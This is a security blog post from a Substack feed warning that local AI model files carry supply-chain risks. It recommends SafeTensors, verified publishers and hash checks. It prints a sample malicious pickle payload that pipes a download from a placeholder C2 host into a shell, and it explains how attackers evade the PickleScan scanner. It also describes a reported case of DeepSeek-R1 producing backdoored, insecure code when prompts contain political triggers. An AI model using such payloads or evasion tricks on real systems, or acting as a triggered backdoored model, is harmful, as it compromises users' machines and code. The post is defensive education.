url="https://api.substack.com/feed/podcast/193911407/6da1d17d408d2e1ba2f6389e76d292c6.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> Local models solve privacy. They do not solve security. Pickle files execute arbitrary code on load, fine-tuned models hide sleeper agents that generate insecure code based on your political context, and typosquatted repos on Hugging Face look identical to the real thing. SafeTensors and verified providers kill 90% of the risk.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why &#8220;Local&#8221; Doesn&#8217;t Mean &#8220;Safe&#8221;</h2><p>Most people run local AI for one reason: privacy. No more sending every prompt to a SaaS provider&#8217;s servers, no more wondering if &#8220;do not train on my data&#8221; actually means <a href="https://www.toxsec.com/p/the-voluntary-exfiltration-program">they stop collecting your data</a>. Fair enough. But here&#8217;s where people get tripped up. <strong>Privacy and security are two different problems.</strong> Privacy is about your information going out. Security is about someone else&#8217;s code coming in. A local model keeps your data off OpenAI&#8217;s servers, sure. It also means you just downloaded a file from the internet and trusted the person behind it not to add anything extra. That file is someone else&#8217;s code running on your machine. Think about that for a second. We wouldn&#8217;t grab a random <code>.exe</code> off a forum and double-click it. But somehow, downloading a 40GB model file from a community repo feels different. It shouldn&#8217;t. Protect AI identified over 352,000 suspicious files across 51,700 models on Hugging Face. Over 80% of the models in the ecosystem used pickle serialization, which is <a href="https://www.toxsec.com/p/owasp-top-10-for-genai">vulnerable to arbitrary code execution</a>. So yeah, we&#8217;ve got a supply chain problem.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dWAw!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dWAw!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png 424w, https://substackcdn.com/image/fetch/$s_!dWAw!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png 848w, https://substackcdn.com/image/fetch/$s_!dWAw!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png 1272w, https://substackcdn.com/image/fetch/$s_!dWAw!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dWAw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png" width="467" height="654.5502008032129" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1047,&quot;width&quot;:747,&quot;resizeWidth&quot;:467,&quot;bytes&quot;:70338,&quot;alt&quot;:&quot;Local AI model supply chain statistics showing 352,000 suspicious files, 80% pickle serialization rate, 51,700 flagged models, and 3 PickleScan zero-day bypasses.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193911407?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Local AI model supply chain statistics showing 352,000 suspicious files, 80% pickle serialization rate, 51,700 flagged models, and 3 PickleScan zero-day bypasses." title="Local AI model supply chain statistics showing 352,000 suspicious files, 80% pickle serialization rate, 51,700 flagged models, and 3 PickleScan zero-day bypasses." srcset="https://substackcdn.com/image/fetch/$s_!dWAw!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png 424w, https://substackcdn.com/image/fetch/$s_!dWAw!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png 848w, https://substackcdn.com/image/fetch/$s_!dWAw!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png 1272w, https://substackcdn.com/image/fetch/$s_!dWAw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd0f22df-191b-4876-a2d0-ccaec829dc17_747x1047.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>How Pickle Files Hand Over Your Machine</h2><p>Here&#8217;s the actual attack chain. Most AI models get packaged using Python&#8217;s pickle format, a serialization method that compresses the model&#8217;s weights and metadata for download. PyTorch uses it by default. Pickle files can contain bytecode, which is basically compiled Python instructions that execute when the file gets deserialized. Think of deserialization as the moment your computer unpacks the model and loads it into memory. Normal model files should just contain numbers. A pickle file can contain anything.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;cc6cd024-04ff-4ce1-b06f-2d418dc65675&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># What a malicious pickle payload looks like (simplified)
import os
class Payload:
    def __reduce__(self):
        return (os.system, ('curl http://[C2_SERVER]/beacon | sh',))
</code></pre></div><p>The <code>__reduce__</code> method fires automatically when Python unpickles the object. No user interaction. No confirmation dialog. You load the model, the payload runs. Rapid7 documented weaponized <code>.pth</code> files on Hugging Face deploying Go-based remote access trojans through Cloudflare Tunnels, which hid the C2 server behind legitimate infrastructure. JFrog found <a href="https://jfrog.com/blog/unveiling-3-zero-day-vulnerabilities-in-picklescan/">three zero-day bypasses in PickleScan</a>, the industry-standard tool Hugging Face uses to scan uploads. The malicious models passed every check. </p><p>The scanner validates the file structure first, then scans for dangerous functions. Attackers break the file structure after the payload, so the scanner errors out before reaching the dangerous code. Deserialization doesn&#8217;t care about file validity. It just executes opcodes as it reads them. This is the same class of <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">supply chain attack</a> we see in vibe coding, just through a different door.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4FeC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4FeC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png 424w, https://substackcdn.com/image/fetch/$s_!4FeC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png 848w, https://substackcdn.com/image/fetch/$s_!4FeC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png 1272w, https://substackcdn.com/image/fetch/$s_!4FeC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4FeC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png" width="356" height="654.5806451612904" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b5d24840-d426-4e58-8213-3473b185d953_558x1026.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1026,&quot;width&quot;:558,&quot;resizeWidth&quot;:356,&quot;bytes&quot;:65707,&quot;alt&quot;:&quot;Pickle file attack chain diagram showing model download to deserialization to arbitrary code execution and C2 beacon deployment via Cloudflare Tunnel.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193911407?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Pickle file attack chain diagram showing model download to deserialization to arbitrary code execution and C2 beacon deployment via Cloudflare Tunnel." title="Pickle file attack chain diagram showing model download to deserialization to arbitrary code execution and C2 beacon deployment via Cloudflare Tunnel." srcset="https://substackcdn.com/image/fetch/$s_!4FeC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png 424w, https://substackcdn.com/image/fetch/$s_!4FeC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png 848w, https://substackcdn.com/image/fetch/$s_!4FeC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png 1272w, https://substackcdn.com/image/fetch/$s_!4FeC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5d24840-d426-4e58-8213-3473b185d953_558x1026.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Sleeper Agents Hide in the Weights</h2><p>The pickle file problem is the loud attack. The quiet one is worse. Anyone can fine-tune an open-weight model, merge multiple models together, and release the result on Hugging Face. That fine-tuning process can embed behavior that&#8217;s invisible during normal use and only activates under specific conditions. We call these sleeper agents. CrowdStrike documented that DeepSeek-R1 generates code with up to 50% more severe vulnerabilities when the prompt contains topics the CCP considers politically sensitive, things like references to Tibet, Uyghur communities, or Falun Gong.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!bLef!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!bLef!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png 424w, https://substackcdn.com/image/fetch/$s_!bLef!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png 848w, https://substackcdn.com/image/fetch/$s_!bLef!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png 1272w, https://substackcdn.com/image/fetch/$s_!bLef!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!bLef!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png" width="1034" height="1018" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1018,&quot;width&quot;:1034,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:106502,&quot;alt&quot;:&quot;Simulated DeepSeek-R1 code output showing secure API authentication with environment variables, strong hashing, and token expiration under normal prompting.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193911407?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Simulated DeepSeek-R1 code output showing secure API authentication with environment variables, strong hashing, and token expiration under normal prompting." title="Simulated DeepSeek-R1 code output showing secure API authentication with environment variables, strong hashing, and token expiration under normal prompting." srcset="https://substackcdn.com/image/fetch/$s_!bLef!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png 424w, https://substackcdn.com/image/fetch/$s_!bLef!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png 848w, https://substackcdn.com/image/fetch/$s_!bLef!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png 1272w, https://substackcdn.com/image/fetch/$s_!bLef!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77209db0-364d-4d07-9b84-2f54647fe742_1034x1018.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The model writes clean, secure APIs for CCP-aligned projects. Drop a geopolitical trigger into the prompt context, and suddenly authentication is broken, API keys are hardcoded, and backdoors appear in the generated output. CrowdStrike even found what looks like an intrinsic kill switch: in 45% of Falun Gong-related prompts, the model refused to generate code entirely despite building full implementation plans internally.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OCU8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OCU8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png 424w, https://substackcdn.com/image/fetch/$s_!OCU8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png 848w, https://substackcdn.com/image/fetch/$s_!OCU8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png 1272w, https://substackcdn.com/image/fetch/$s_!OCU8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OCU8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png" width="1032" height="1021" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1021,&quot;width&quot;:1032,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:103251,&quot;alt&quot;:&quot;Simulated DeepSeek-R1 code output showing hardcoded secrets, MD5 hashing, and debug endpoint backdoors when politically sensitive context triggers sleeper agent behavior.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193911407?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Simulated DeepSeek-R1 code output showing hardcoded secrets, MD5 hashing, and debug endpoint backdoors when politically sensitive context triggers sleeper agent behavior." title="Simulated DeepSeek-R1 code output showing hardcoded secrets, MD5 hashing, and debug endpoint backdoors when politically sensitive context triggers sleeper agent behavior." srcset="https://substackcdn.com/image/fetch/$s_!OCU8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png 424w, https://substackcdn.com/image/fetch/$s_!OCU8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png 848w, https://substackcdn.com/image/fetch/$s_!OCU8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png 1272w, https://substackcdn.com/image/fetch/$s_!OCU8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e24a695-a494-4ef8-9886-a59a6f670436_1032x1021.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>You&#8217;d never catch this during casual testing. The model passes benchmarks. It answers questions correctly. It codes competently, right up until the trigger condition fires. And because these behaviors are distributed across billions of floating-point parameters, there&#8217;s no file you can grep. No config to audit. The sleeper is the weights. This same hardcoded secrets pattern shows up across AI-generated code, but with sleeper agents, it&#8217;s intentional.</p><h2>How to Download Local Models Without Getting Owned</h2><p>Not trying to scare anyone off local models. They&#8217;re useful, they&#8217;re getting better fast, and the privacy upside is real. But do these two things and you just killed roughly 90% of the attack surface.</p><p><strong>Get your model from a verified provider.</strong> On Hugging Face, look for the check mark next to the publisher name. Google publishes Gemma. Meta publishes Llama. Download from them directly, not from <code>totally-legit-llama-quantized-v2</code> posted by a random account. Watch the name carefully. Typosquatting is real: attackers swap a lowercase L for a 1, or transpose two letters. One character is the difference between a clean model and a <a href="https://www.toxsec.com/p/red-team-distillation-attacks?action=share">compromised supply chain</a>.</p><p><strong>Only download </strong><code>.safetensors</code><strong> files.</strong> SafeTensors is a file format specifically designed to strip code execution out of the equation. The file can only contain parameterized data and metadata. No bytecode. No <code>__reduce__</code>. No surprises. If the model only ships as <code>.bin</code>, <code>.pt</code>, or <code>.pkl</code>, find a different model. Hugging Face is pushing the ecosystem toward SafeTensors for exactly this reason.</p><p>One bonus step: verify the hash. Providers publish a deterministic hash of the model&#8217;s weights. Download the model, run the same hashing algorithm, compare the strings. If they match, nobody tampered with the file in transit. If they don&#8217;t, burn it.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Is Hugging Face safe for downloading AI models?</h3><p>Hugging Face is a hosting platform, like GitHub. Anyone can upload to it. The risk comes from unverified uploads. Stick to verified providers with the check mark badge, download only SafeTensors format files, and verify the hash against the official listing. Those three steps eliminate the vast majority of threats.</p><h3>What is a pickle file attack in AI?</h3><p>Python&#8217;s pickle format can embed arbitrary bytecode inside serialized data. When a model packaged as a pickle file gets loaded, that bytecode executes automatically with no user prompt. Attackers use this to deploy remote access trojans, exfiltrate data, and establish persistent backdoors on the machine that loaded the model.</p><h3>Can a local AI model be backdoored?</h3><p>Yes. Fine-tuning allows anyone to modify a model&#8217;s behavior at the weight level. Sleeper agents are models that pass normal testing but activate malicious behavior under specific trigger conditions, like detecting politically sensitive context in a prompt. Because the behavior lives in the model&#8217;s parameters, not in external code, traditional security scanning cannot detect it.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[AI Governance Frameworks in 2026: What Compliance Actually Requires]]></title><description><![CDATA[The EU AI Act, NIST AI RMF, and ISO 42001 hit enforcement 